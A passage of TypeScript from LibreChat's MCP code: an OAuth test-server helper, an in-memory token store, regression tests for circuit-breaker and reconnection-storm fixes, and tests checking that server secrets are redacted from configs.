if (!refreshToken || !issuedRefreshTokens.has(refreshToken)) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
const issueTime = refreshTokenIssueTimes.get(refreshToken) ?? 0;
if (Date.now() - issueTime > refreshTokenTTLMs) {
issuedRefreshTokens.delete(refreshToken);
refreshTokenIssueTimes.delete(refreshToken);
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
const newAccessToken = randomUUID();
issuedTokens.add(newAccessToken);
tokenIssueTimes.set(newAccessToken, Date.now());
const tokenResponse: Record<string, string | number> = {
access_token: newAccessToken,
token_type: 'Bearer',
expires_in: Math.ceil(tokenTTLMs / 1000),
};
if (rotateRefreshTokens) {
issuedRefreshTokens.delete(refreshToken);
refreshTokenIssueTimes.delete(refreshToken);
const newRefreshToken = randomUUID();
issuedRefreshTokens.set(newRefreshToken, newAccessToken);
refreshTokenIssueTimes.set(newRefreshToken, Date.now());
tokenResponse.refresh_token = newRefreshToken;
}
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify(tokenResponse));
return;
}
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'unsupported_grant_type' }));
return;
}
// All other paths require Bearer token auth
const authHeader = req.headers.authorization;
if (!authHeader || !authHeader.startsWith('Bearer ')) {
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
const token = authHeader.slice(7);
if (!issuedTokens.has(token)) {
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
const issueTime = tokenIssueTimes.get(token) ?? 0;
if (Date.now() - issueTime > tokenTTLMs) {
issuedTokens.delete(token);
tokenIssueTimes.delete(token);
res.writeHead(401, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_token' }));
return;
}
// Authenticated MCP request — route to transport
const sid = req.headers['mcp-session-id'] as string | undefined;
let transport = sid ? sessions.get(sid) : undefined;
if (!transport) {
transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
});
const mcp = new McpServer({ name: 'oauth-test-server', version: '0.0.1' });
mcp.tool('echo', { message: z.string() }, async (args) => ({
content: [{ type: 'text' as const, text: `echo: ${args.message}` }],
}));
await mcp.connect(transport);
}
await transport.handleRequest(req, res);
if (transport.sessionId && !sessions.has(transport.sessionId)) {
sessions.set(transport.sessionId, transport);
transport.onclose = () => sessions.delete(transport!.sessionId!);
}
});
const destroySockets = trackSockets(httpServer);
port = await getFreePort();
await new Promise<void>((resolve) => httpServer.listen(port, '127.0.0.1', resolve));
return {
url: `http://127.0.0.1:${port}/`,
port,
issuedTokens,
tokenTTL: tokenTTLMs,
tokenIssueTimes,
issuedRefreshTokens,
registeredClients,
getAuthCode: async () => {
const authRes = await fetch(
`http://127.0.0.1:${port}/authorize?redirect_uri=http://localhost&state=test`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
return new URL(location).searchParams.get('code') ?? '';
},
close: async () => {
const closing = [...sessions.values()].map((t) => t.close().catch(() => undefined));
sessions.clear();
await Promise.all(closing);
await destroySockets();
},
};
}
export interface InMemoryToken {
userId: string;
type: string;
identifier: string;
token: string;
expiresAt: Date;
createdAt: Date;
metadata?: Map<string, unknown> | Record<string, unknown>;
}
export class InMemoryTokenStore {
private tokens: Map<string, InMemoryToken> = new Map();
private key(filter: { userId?: string; type?: string; identifier?: string }): string {
return `${filter.userId}:${filter.type}:${filter.identifier}`;
}
findToken = async (filter: {
userId?: string;
type?: string;
identifier?: string;
}): Promise<InMemoryToken | null> => {
for (const token of this.tokens.values()) {
const matchUserId = !filter.userId || token.userId === filter.userId;
const matchType = !filter.type || token.type === filter.type;
const matchIdentifier = !filter.identifier || token.identifier === filter.identifier;
if (matchUserId && matchType && matchIdentifier) {
return token;
}
}
return null;
};
createToken = async (data: {
userId: string;
type: string;
identifier: string;
token: string;
expiresIn?: number;
metadata?: Record<string, unknown>;
}): Promise<InMemoryToken> => {
const expiresIn = data.expiresIn ?? 365 * 24 * 60 * 60;
const token: InMemoryToken = {
userId: data.userId,
type: data.type,
identifier: data.identifier,
token: data.token,
expiresAt: new Date(Date.now() + expiresIn * 1000),
createdAt: new Date(),
metadata: data.metadata,
};
this.tokens.set(this.key(data), token);
return token;
};
updateToken = async (
filter: { userId?: string; type?: string; identifier?: string },
data: {
userId?: string;
type?: string;
identifier?: string;
token?: string;
expiresIn?: number;
metadata?: Record<string, unknown>;
},
): Promise<InMemoryToken> => {
const existing = await this.findToken(filter);
if (!existing) {
throw new Error(`Token not found for filter: ${JSON.stringify(filter)}`);
}
const existingKey = this.key(existing);
const updated: InMemoryToken = {
...existing,
token: data.token ?? existing.token,
// Use a null check (not truthiness) so an explicit expiresIn of 0 still resets the expiry
expiresAt:
data.expiresIn != null ? new Date(Date.now() + data.expiresIn * 1000) : existing.expiresAt,
metadata: data.metadata ?? existing.metadata,
};
this.tokens.set(existingKey, updated);
return updated;
};
deleteToken = async (filter: {
userId: string;
type: string;
identifier: string;
}): Promise<void> => {
this.tokens.delete(this.key(filter));
};
getAll(): InMemoryToken[] {
return [...this.tokens.values()];
}
clear(): void {
this.tokens.clear();
}
}
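A minimal standalone sketch of the store's keying behavior: `createToken` keys entries by the `userId:type:identifier` triple, so creating a second token with the same triple overwrites the first instead of adding a duplicate. The names here mirror the class above but this snippet is self-contained and illustrative only.

```typescript
// Entries are keyed by the `${userId}:${type}:${identifier}` triple,
// mirroring InMemoryTokenStore's key() method above.
const tokens = new Map<string, { token: string; expiresAt: Date }>();
const key = (u: string, t: string, i: string) => `${u}:${t}:${i}`;

function createToken(
  userId: string,
  type: string,
  identifier: string,
  token: string,
  expiresIn = 3600,
) {
  const entry = { token, expiresAt: new Date(Date.now() + expiresIn * 1000) };
  // Map.set overwrites any existing entry under the same key.
  tokens.set(key(userId, type, identifier), entry);
  return entry;
}

createToken('u1', 'oauth', 'github', 'tok-a');
createToken('u1', 'oauth', 'github', 'tok-b'); // same triple: overwrites
console.log(tokens.size); // 1
```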


@@ -0,0 +1,668 @@
/**
* Reconnection storm regression tests for PR #12162.
*
* Validates circuit breaker, throttling, cooldown, and timeout fixes using real
* MCP SDK transports (no mocked stubs). A real StreamableHTTP server is spun up
* per test suite and MCPConnection talks to it through a genuine HTTP stack.
*/
import http from 'http';
import { randomUUID } from 'crypto';
import express from 'express';
import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
import { isInitializeRequest } from '@modelcontextprotocol/sdk/types.js';
import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
import type { Socket } from 'net';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
import { OAuthReconnectionTracker } from '~/mcp/oauth/OAuthReconnectionTracker';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import { MCPConnection } from '~/mcp/connection';
import { mcpConfig } from '~/mcp/mcpConfig';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
}));
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
interface TestServer {
url: string;
httpServer: http.Server;
close: () => Promise<void>;
}
function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
function startMCPServer(): Promise<TestServer> {
const app = express();
app.use(express.json());
const transports: Record<string, StreamableHTTPServerTransport> = {};
function createServer(): McpServer {
const server = new McpServer({ name: 'test-server', version: '1.0.0' });
server.tool('echo', 'echoes input', { message: { type: 'string' } as never }, async (args) => {
const msg = (args as Record<string, string>).message ?? '';
return { content: [{ type: 'text', text: msg }] };
});
return server;
}
app.all('/mcp', async (req, res) => {
const sessionId = req.headers['mcp-session-id'] as string | undefined;
if (sessionId && transports[sessionId]) {
await transports[sessionId].handleRequest(req, res, req.body);
return;
}
if (!sessionId && isInitializeRequest(req.body)) {
const transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
onsessioninitialized: (sid) => {
transports[sid] = transport;
},
});
transport.onclose = () => {
const sid = transport.sessionId;
if (sid) {
delete transports[sid];
}
};
const server = createServer();
await server.connect(transport);
await transport.handleRequest(req, res, req.body);
return;
}
if (req.method === 'GET') {
res.status(404).send('Not Found');
return;
}
res.status(400).json({
jsonrpc: '2.0',
error: { code: -32000, message: 'Bad Request: No valid session ID provided' },
id: null,
});
});
return new Promise((resolve) => {
const httpServer = app.listen(0, '127.0.0.1', () => {
const destroySockets = trackSockets(httpServer);
const addr = httpServer.address() as { port: number };
resolve({
url: `http://127.0.0.1:${addr.port}/mcp`,
httpServer,
close: async () => {
for (const t of Object.values(transports)) {
t.close().catch(() => {});
}
await destroySockets();
},
});
});
});
}
function createConnection(serverName: string, url: string, initTimeout = 5000): MCPConnection {
return new MCPConnection({
serverName,
serverConfig: { url, type: 'streamable-http', initTimeout } as never,
});
}
async function teardownConnection(conn: MCPConnection): Promise<void> {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
conn.removeAllListeners();
await conn.disconnect();
}
afterEach(() => {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(MCPConnection as any).circuitBreakers.clear();
});
/* ------------------------------------------------------------------ */
/* Fix #2 — Circuit breaker trips after rapid connect/disconnect */
/* cycles (CB_MAX_CYCLES within window -> cooldown) */
/* ------------------------------------------------------------------ */
describe('Fix #2: Circuit breaker stops rapid reconnect cycling', () => {
it('blocks connection after CB_MAX_CYCLES rapid cycles via static circuit breaker', async () => {
const srv = await startMCPServer();
const conn = createConnection('cycling-server', srv.url);
let completedCycles = 0;
let breakerMessage = '';
const maxAttempts = mcpConfig.CB_MAX_CYCLES * 2;
for (let cycle = 0; cycle < maxAttempts; cycle++) {
try {
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
completedCycles++;
} catch (e) {
breakerMessage = (e as Error).message;
break;
}
}
expect(breakerMessage).toContain('Circuit breaker is open');
expect(completedCycles).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #3 — SSE 400/405 handled in same branch as 404 */
/* ------------------------------------------------------------------ */
describe('Fix #3: SSE 400/405 handled in same branch as 404', () => {
it('400 with active session triggers reconnection (session lost)', async () => {
const srv = await startMCPServer();
const conn = createConnection('sse-400', srv.url);
await conn.connect();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
const changes: string[] = [];
conn.on('connectionChange', (s: string) => changes.push(s));
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const transport = (conn as any).transport;
transport.onerror({ message: 'Failed to open SSE stream', code: 400 });
expect(changes).toContain('error');
await teardownConnection(conn);
await srv.close();
});
it('405 with active session triggers reconnection (session lost)', async () => {
const srv = await startMCPServer();
const conn = createConnection('sse-405', srv.url);
await conn.connect();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = true;
const changes: string[] = [];
conn.on('connectionChange', (s: string) => changes.push(s));
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const transport = (conn as any).transport;
transport.onerror({ message: 'Method Not Allowed', code: 405 });
expect(changes).toContain('error');
await teardownConnection(conn);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #4 — Circuit breaker state persists in static Map across */
/* instance replacements */
/* ------------------------------------------------------------------ */
describe('Fix #4: Circuit breaker state persists across instance replacement', () => {
it('new MCPConnection for same serverName inherits breaker state from static Map', async () => {
const srv = await startMCPServer();
const conn1 = createConnection('replace', srv.url);
await conn1.connect();
await teardownConnection(conn1);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cbAfterConn1 = (MCPConnection as any).circuitBreakers.get('replace');
expect(cbAfterConn1).toBeDefined();
const cyclesAfterConn1 = cbAfterConn1.cycleCount;
expect(cyclesAfterConn1).toBeGreaterThan(0);
const conn2 = createConnection('replace', srv.url);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cbFromConn2 = (conn2 as any).getCircuitBreaker();
expect(cbFromConn2.cycleCount).toBe(cyclesAfterConn1);
await teardownConnection(conn2);
await srv.close();
});
it('clearCooldown resets static state so explicit retry proceeds', () => {
const conn = createConnection('replace', 'http://127.0.0.1:1/mcp');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (conn as any).getCircuitBreaker();
cb.cooldownUntil = Date.now() + 999_999;
// eslint-disable-next-line @typescript-eslint/no-explicit-any
expect((conn as any).isCircuitOpen()).toBe(true);
MCPConnection.clearCooldown('replace');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
expect((conn as any).isCircuitOpen()).toBe(false);
});
});
/* ------------------------------------------------------------------ */
/* Fix #5 — Dead servers now trigger circuit breaker via */
/* recordFailedRound() in the catch path */
/* ------------------------------------------------------------------ */
describe('Fix #5: Dead server triggers circuit breaker', () => {
it('failures trigger backoff, blocking subsequent attempts before they reach the SDK', async () => {
const conn = createConnection('dead', 'http://127.0.0.1:1/mcp', 1000);
const spy = jest.spyOn(conn.client, 'connect');
const totalAttempts = mcpConfig.CB_MAX_FAILED_ROUNDS + 2;
const errors: string[] = [];
for (let i = 0; i < totalAttempts; i++) {
try {
await conn.connect();
} catch (e) {
errors.push((e as Error).message);
}
}
expect(spy.mock.calls.length).toBe(mcpConfig.CB_MAX_FAILED_ROUNDS);
expect(errors).toHaveLength(totalAttempts);
expect(errors.filter((m) => m.includes('Circuit breaker is open'))).toHaveLength(2);
await conn.disconnect();
});
it('user B is immediately blocked when user A already tripped the breaker for the same server', async () => {
const deadUrl = 'http://127.0.0.1:1/mcp';
const userA = new MCPConnection({
serverName: 'shared-dead',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-A',
});
for (let i = 0; i < mcpConfig.CB_MAX_FAILED_ROUNDS; i++) {
try {
await userA.connect();
} catch {
// expected
}
}
const userB = new MCPConnection({
serverName: 'shared-dead',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-B',
});
const spyB = jest.spyOn(userB.client, 'connect');
let blockedMessage = '';
try {
await userB.connect();
} catch (e) {
blockedMessage = (e as Error).message;
}
expect(blockedMessage).toContain('Circuit breaker is open');
expect(spyB).toHaveBeenCalledTimes(0);
await userA.disconnect();
await userB.disconnect();
});
it('clearCooldown after user retry unblocks all users', async () => {
const deadUrl = 'http://127.0.0.1:1/mcp';
const userA = new MCPConnection({
serverName: 'shared-dead-clear',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-A',
});
for (let i = 0; i < mcpConfig.CB_MAX_FAILED_ROUNDS; i++) {
try {
await userA.connect();
} catch {
// expected
}
}
const userB = new MCPConnection({
serverName: 'shared-dead-clear',
serverConfig: { url: deadUrl, type: 'streamable-http', initTimeout: 1000 } as never,
userId: 'user-B',
});
try {
await userB.connect();
} catch (e) {
expect((e as Error).message).toContain('Circuit breaker is open');
}
MCPConnection.clearCooldown('shared-dead-clear');
const spyB = jest.spyOn(userB.client, 'connect');
try {
await userB.connect();
} catch {
// expected — server is still dead
}
expect(spyB).toHaveBeenCalledTimes(1);
await userA.disconnect();
await userB.disconnect();
});
});
/* ------------------------------------------------------------------ */
/* Fix #5b — disconnect(false) preserves cycle tracking */
/* ------------------------------------------------------------------ */
describe('Fix #5b: disconnect(false) preserves cycle tracking', () => {
it('connect() passes false to disconnect, which calls recordCycle()', async () => {
const srv = await startMCPServer();
const conn = createConnection('wipe', srv.url);
const spy = jest.spyOn(conn, 'disconnect');
await conn.connect();
expect(spy).toHaveBeenCalledWith(false);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get('wipe');
expect(cb).toBeDefined();
expect(cb.cycleCount).toBeGreaterThan(0);
await teardownConnection(conn);
await srv.close();
});
});
/* ------------------------------------------------------------------ */
/* Fix #6 — OAuth failure uses cooldown-based retry */
/* ------------------------------------------------------------------ */
describe('Fix #6: OAuth failure uses cooldown-based retry', () => {
beforeEach(() => jest.useFakeTimers());
afterEach(() => jest.useRealTimers());
it('isFailed expires after first cooldown of 5 min', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
expect(tracker.isFailed('u1', 'srv')).toBe(true);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
it('progressive cooldown: 5m, 10m, 20m, 30m (capped)', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(10 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(20 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
it('removeFailed resets attempt count so next failure starts at 5m', () => {
jest.setSystemTime(Date.now());
const tracker = new OAuthReconnectionTracker();
tracker.setFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
tracker.removeFailed('u1', 'srv');
tracker.setFailed('u1', 'srv');
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed('u1', 'srv')).toBe(false);
});
});
/* ------------------------------------------------------------------ */
/* Integration: Circuit breaker caps rapid cycling with real transport */
/* ------------------------------------------------------------------ */
describe('Cascade: Circuit breaker caps rapid cycling', () => {
it('breaker trips before double CB_MAX_CYCLES complete against a live server', async () => {
const srv = await startMCPServer();
const conn = createConnection('cascade', srv.url);
const spy = jest.spyOn(conn.client, 'connect');
let completedCycles = 0;
const maxAttempts = mcpConfig.CB_MAX_CYCLES * 2;
for (let i = 0; i < maxAttempts; i++) {
try {
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
completedCycles++;
} catch (e) {
if ((e as Error).message.includes('Circuit breaker is open')) {
break;
}
throw e;
}
}
expect(completedCycles).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
expect(spy.mock.calls.length).toBeLessThanOrEqual(mcpConfig.CB_MAX_CYCLES);
await srv.close();
});
it('breaker bounds failures against a killed server', async () => {
const srv = await startMCPServer();
const conn = createConnection('cascade-die', srv.url, 2000);
await conn.connect();
await teardownConnection(conn);
// eslint-disable-next-line @typescript-eslint/no-explicit-any
(conn as any).shouldStopReconnecting = false;
await srv.close();
let breakerTripped = false;
for (let i = 0; i < 10; i++) {
try {
await conn.connect();
} catch (e) {
if ((e as Error).message.includes('Circuit breaker is open')) {
breakerTripped = true;
break;
}
}
}
expect(breakerTripped).toBe(true);
}, 30_000);
});
/* ------------------------------------------------------------------ */
/* OAuth: cycle recovery after successful OAuth reconnect */
/* ------------------------------------------------------------------ */
describe('OAuth: cycle budget recovery after successful OAuth', () => {
let oauthServer: OAuthTestServer;
beforeEach(async () => {
oauthServer = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await oauthServer.close();
});
async function exchangeCodeForToken(serverUrl: string): Promise<string> {
const authRes = await fetch(`${serverUrl}authorize?redirect_uri=http://localhost&state=test`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${serverUrl}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const data = (await tokenRes.json()) as { access_token: string };
return data.access_token;
}
it('should decrement cycle count after successful OAuth recovery', async () => {
const serverName = 'oauth-cycle-test';
MCPConnection.clearCooldown(serverName);
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: 'user-1',
});
// When oauthRequired fires, get a token and emit oauthHandled
// This triggers the oauthRecovery path inside connectClient
conn.on('oauthRequired', async () => {
const accessToken = await exchangeCodeForToken(oauthServer.url);
conn.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
conn.emit('oauthHandled');
});
// connect() → 401 → oauthRequired → oauthHandled → connectClient returns
// connect() sees not connected → throws "Connection not established"
await expect(conn.connect()).rejects.toThrow('Connection not established');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get(serverName);
const cyclesBeforeRetry = cb.cycleCount;
// Retry — should succeed and decrement cycle count via oauthRecovery
await conn.connect();
expect(await conn.isConnected()).toBe(true);
const cyclesAfterSuccess = cb.cycleCount;
// The retry adds +1 cycle (disconnect(false)) then -1 (oauthRecovery decrement)
// So cyclesAfterSuccess should equal cyclesBeforeRetry, not cyclesBeforeRetry + 1
expect(cyclesAfterSuccess).toBe(cyclesBeforeRetry);
await teardownConnection(conn);
});
it('should allow more OAuth reconnects than non-OAuth before breaker trips', async () => {
const serverName = 'oauth-budget';
MCPConnection.clearCooldown(serverName);
// Each OAuth flow: connect (+1) → 401 → oauthHandled → retry connect (+1) → success (-1) = net 1
// Without the decrement it would be net 2 per flow, tripping the breaker after ~2 users
let successfulFlows = 0;
for (let i = 0; i < 10; i++) {
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: `user-${i}`,
});
conn.on('oauthRequired', async () => {
const accessToken = await exchangeCodeForToken(oauthServer.url);
conn.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
conn.emit('oauthHandled');
});
try {
// First connect: 401 → oauthHandled → returns without connection
await conn.connect().catch(() => {});
// Retry: succeeds with token, decrements cycle
await conn.connect();
successfulFlows++;
await teardownConnection(conn);
} catch (e) {
conn.removeAllListeners();
if ((e as Error).message.includes('Circuit breaker is open')) {
break;
}
}
}
// With the oauthRecovery decrement, each flow is net ~1 cycle instead of ~2,
// so we should get more successful flows before the breaker trips
expect(successfulFlows).toBeGreaterThanOrEqual(3);
});
it('should not decrement cycle count when OAuth fails', async () => {
const serverName = 'oauth-failed-no-decrement';
MCPConnection.clearCooldown(serverName);
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: 'user-1',
});
conn.on('oauthRequired', () => {
conn.emit('oauthFailed', new Error('user denied'));
});
await expect(conn.connect()).rejects.toThrow();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get(serverName);
const cyclesAfterFailure = cb.cycleCount;
// connect() recorded +1 cycle, oauthFailed should NOT decrement
expect(cyclesAfterFailure).toBeGreaterThanOrEqual(1);
conn.removeAllListeners();
});
});
/* ------------------------------------------------------------------ */
/* Sanity: Real transport works end-to-end */
/* ------------------------------------------------------------------ */
describe('Sanity: Real MCP SDK transport works correctly', () => {
it('connects, lists tools, and disconnects cleanly', async () => {
const srv = await startMCPServer();
const conn = createConnection('sanity', srv.url);
await conn.connect();
expect(await conn.isConnected()).toBe(true);
const tools = await conn.fetchTools();
expect(tools).toEqual(expect.arrayContaining([expect.objectContaining({ name: 'echo' })]));
await teardownConnection(conn);
await srv.close();
});
});
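The cycle-based breaker these tests exercise can be sketched as a counter inside a sliding window that opens a cooldown once the cycle budget is exhausted. This is a self-contained approximation of the `recordCycle`/`isCircuitOpen` pair; the constants are illustrative stand-ins, not the real `mcpConfig` values.

```typescript
// Illustrative constants; the production values live in mcpConfig.
const MAX_CYCLES = 3;
const CYCLE_WINDOW_MS = 60_000;
const COOLDOWN_MS = 120_000;

const state = { cycleCount: 0, cycleWindowStart: Date.now(), cooldownUntil: 0 };

function recordCycle(now = Date.now()): void {
  // Reset the counter when the observation window has elapsed.
  if (now - state.cycleWindowStart > CYCLE_WINDOW_MS) {
    state.cycleCount = 0;
    state.cycleWindowStart = now;
  }
  state.cycleCount++;
  if (state.cycleCount >= MAX_CYCLES) {
    // Trip the breaker: block attempts until the cooldown expires.
    state.cooldownUntil = now + COOLDOWN_MS;
    state.cycleCount = 0;
    state.cycleWindowStart = now;
  }
}

const isOpen = (now = Date.now()) => now < state.cooldownUntil;

recordCycle();
recordCycle();
console.log(isOpen()); // false — two cycles stay within budget
recordCycle(); // third cycle trips the breaker
console.log(isOpen()); // true
```

A connect attempt would consult `isOpen()` first and fail fast while the cooldown is active, which is exactly what the "Circuit breaker is open" assertions above rely on.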


@@ -1,4 +1,5 @@
import { normalizeServerName, redactServerSecrets, redactAllServerSecrets } from '~/mcp/utils';
import type { ParsedServerConfig } from '~/mcp/types';
describe('normalizeServerName', () => {
it('should not modify server names that already match the pattern', () => {
@@ -26,3 +27,201 @@ describe('normalizeServerName', () => {
expect(result).toMatch(/^[a-zA-Z0-9_.-]+$/);
});
});
describe('redactServerSecrets', () => {
it('should strip apiKey.key from admin-sourced keys', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'super-secret-api-key',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.source).toBe('admin');
expect(redacted.apiKey?.authorization_type).toBe('bearer');
});
it('should strip oauth.client_secret', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
oauth: {
client_id: 'my-client',
client_secret: 'super-secret-oauth',
scope: 'read',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.oauth?.client_secret).toBeUndefined();
expect(redacted.oauth?.client_id).toBe('my-client');
expect(redacted.oauth?.scope).toBe('read');
});
it('should strip both apiKey.key and oauth.client_secret simultaneously', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: {
source: 'admin',
authorization_type: 'custom',
custom_header: 'X-API-Key',
key: 'secret-key',
},
oauth: {
client_id: 'cid',
client_secret: 'csecret',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.custom_header).toBe('X-API-Key');
expect(redacted.oauth?.client_secret).toBeUndefined();
expect(redacted.oauth?.client_id).toBe('cid');
});
it('should exclude headers from SSE configs', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'SSE Server',
};
(config as ParsedServerConfig & { headers: Record<string, string> }).headers = {
Authorization: 'Bearer admin-token-123',
'X-Custom': 'safe-value',
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).headers).toBeUndefined();
expect(redacted.title).toBe('SSE Server');
});
it('should exclude env from stdio configs', () => {
const config: ParsedServerConfig = {
type: 'stdio',
command: 'node',
args: ['server.js'],
env: { DATABASE_URL: 'postgres://admin:password@localhost/db', PATH: '/usr/bin' },
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).env).toBeUndefined();
expect((redacted as Record<string, unknown>).command).toBeUndefined();
expect((redacted as Record<string, unknown>).args).toBeUndefined();
});
it('should exclude oauth_headers', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
oauth_headers: { Authorization: 'Bearer oauth-admin-token' },
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).oauth_headers).toBeUndefined();
});
it('should strip apiKey.key even for user-sourced keys', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: { source: 'user', authorization_type: 'bearer', key: 'my-own-key' },
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.source).toBe('user');
});
it('should not mutate the original config', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'secret' },
oauth: { client_id: 'cid', client_secret: 'csecret' },
};
redactServerSecrets(config);
expect(config.apiKey?.key).toBe('secret');
expect(config.oauth?.client_secret).toBe('csecret');
});
it('should preserve all safe metadata fields', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'My Server',
description: 'A test server',
iconPath: '/icons/test.png',
chatMenu: true,
requiresOAuth: false,
capabilities: '{"tools":{}}',
tools: 'tool_a, tool_b',
dbId: 'abc123',
updatedAt: 1700000000000,
consumeOnly: false,
inspectionFailed: false,
customUserVars: { API_KEY: { title: 'API Key', description: 'Your key' } },
};
const redacted = redactServerSecrets(config);
expect(redacted.title).toBe('My Server');
expect(redacted.description).toBe('A test server');
expect(redacted.iconPath).toBe('/icons/test.png');
expect(redacted.chatMenu).toBe(true);
expect(redacted.requiresOAuth).toBe(false);
expect(redacted.capabilities).toBe('{"tools":{}}');
expect(redacted.tools).toBe('tool_a, tool_b');
expect(redacted.dbId).toBe('abc123');
expect(redacted.updatedAt).toBe(1700000000000);
expect(redacted.consumeOnly).toBe(false);
